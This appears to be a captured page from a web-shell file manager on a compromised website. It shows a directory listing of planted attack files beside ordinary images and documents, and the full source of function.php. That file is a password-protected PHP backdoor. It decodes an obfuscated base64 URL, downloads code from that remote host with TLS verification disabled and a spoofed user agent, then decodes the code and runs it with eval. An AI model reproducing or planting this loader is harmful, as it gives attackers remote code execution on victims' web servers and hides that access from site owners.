Gecko [ ambitioneducationfoundation.com ]

Name	Size	Permission
PaxHeader	[ DIR ]	drwxrwxrwx
js	[ DIR ]	drwxrwxrwx
.mad-root	0 B	-rw-rw-rw-
BioData (R07-928).doc	41.5 KB	-rw-rw-rw-
CAS4C67OCAEE8X8VCAVH63YICAVUP6...	2.36 KB	-rw-rw-rw-
CAW.jpg	8.37 KB	-rw-rw-rw-
Desert.jpg	826.11 KB	-rw-rw-rw-
Hydrangeas.jpg	581.33 KB	-rw-rw-rw-
SECURE.php	0 B	-rw-rw-rw-
Thumbs.db	22.5 KB	-rw-rw-rw-
UnknownSec.php	111.82 KB	-rw-rw-rw-
adminer.php	465.43 KB	-rw-rw-rw-
center	0 B	-rw-rw-rw-
eaaa.phtml	61.39 KB	-rw-rw-rw-
function.php	2.1 KB	-rw-rw-rw-
gecko-new.php	172.83 KB	-r--r--r--
images.jpg	8.72 KB	-rw-rw-rw-
img01.gif	1.77 KB	-rw-rw-rw-
lin.asp	4.7 KB	-rw-rw-rw-
msf.aspx	681 B	-rw-rw-rw-
pwnkit	0 B	-rw-rw-rw-
test.php	39 B	-rw-rw-rw-
untitled.bmp	82.15 KB	-rw-rw-rw-

Code Editor : function.php

<?php
$password = 'f9fe86c6d831b4d86940801dc380da55';
error_reporting(0);
set_time_limit(0);

session_start();
if (!isset($_SESSION['loggedIn'])) {
    $_SESSION['loggedIn'] = false;
}

if (isset($_POST['password'])) {
    if (md5($_POST['password']) == $password) {
        $_SESSION['loggedIn'] = true;
    }
}

if (!$_SESSION['loggedIn']): ?>

<html><head><title> </title></head>
  <body>
</script>
<link href="https://fonts.googleapis.com/css?family=Rye" rel="stylesheet">
</head>
<style>
	input { margin:0;background-color:#fff;border:1px solid #fff; }
</style>
<center><h1><center><font color="#ff0000" face="Rye">Sundanese Agency Pride</font><br>
<meta charset="UTF-8">
    <p align="center"><center><font style="font-size:13px" color="#008000" face="Trebuchet MS">
    <form method="post">
      <input type="password" name="password">
      <input type="submit" name="submit" value="  ">
    </form>
  </body>
</html>

<?php
exit();
endif;
?>
<?php
function xx1kontl($str,$pwd){
	$pwd=base64_encode($pwd);
	$str=base64_decode($str);
	$enc_chr="";
	$enc_str="";
	$i=0;
	while($i<strlen($str)){
		for($j=0;$j<strlen($pwd);$j++){
		$enc_chr=chr(ord($str[$i])^ord($pwd[$j]));
		$enc_str.=$enc_chr;
		$i++;
			if($i>=strlen($str))break;
		}
	}
	return base64_decode($enc_str);
}
$n2db95e8e1a92=base64_decode('aHR0cHM6Ly9tc3RvcmUuc2svdG9vbHMvc2NyaXB0LnR4dA==');if(function_exists(base64_decode('Y3VybF9pbml0'))){$ld88fc6edf21e=curl_init();curl_setopt($ld88fc6edf21e,CURLOPT_URL,$n2db95e8e1a92);curl_setopt($ld88fc6edf21e,CURLOPT_RETURNTRANSFER,1);curl_setopt($ld88fc6edf21e,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($ld88fc6edf21e,CURLOPT_FOLLOWLOCATION,true);curl_setopt($ld88fc6edf21e,CURLOPT_HEADER,FALSE);curl_setopt($ld88fc6edf21e,CURLOPT_USERAGENT,base64_decode('TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTEuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExMS4wLjAuMCBTYWZhcmkvNTM3LjM2'));$t841a2d689ad8=curl_exec($ld88fc6edf21e);curl_close($ld88fc6edf21e);}else{$t841a2d689ad8=@file_get_contents($n2db95e8e1a92);}eval(base64_decode(strrev($t841a2d689ad8)));?>

${this.title}

Code Editor : function.php